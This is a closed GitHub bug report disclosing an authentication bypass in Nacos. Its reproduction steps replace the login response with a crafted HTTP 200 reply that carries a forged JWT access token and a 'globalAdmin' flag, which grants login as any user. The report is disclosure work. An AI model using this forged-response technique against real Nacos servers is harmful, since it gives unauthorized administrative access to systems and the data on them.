Closed
Description
Describe the bug
A clear and concise description of what the bug is.
A vulnerability was found that could cause any existing user to log in
Expected behavior
A clear and concise description of what you expected to happen.
Acutally behavior
A clear and concise description of what you actually to happen.
How to Reproduce
Steps to reproduce the behavior:
- Download the latest version of NacOS
- Access prompt page
- Enter any user name and password,Click login to capture packets
Change the returned package to the following
HTTP/1.1 200
Server: nginx/1.19.6
Date: Sun, 11 Apr 2021 01:48:17 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: http://47.93.46.78:9090
Access-Control-Allow-Credentials: true
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA
Content-Length: 162
{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}
4. We can see the successful login
Desktop (please complete the following information):
- OS: [e.g. Centos]
- Version [All]
- Module [e.g. naming/config]
- SDK [e.g. original, spring-cloud-alibaba-nacos, dubbo]
Additional context
Add any other context about the problem here.
Metadata
Assignees
Labels
No labels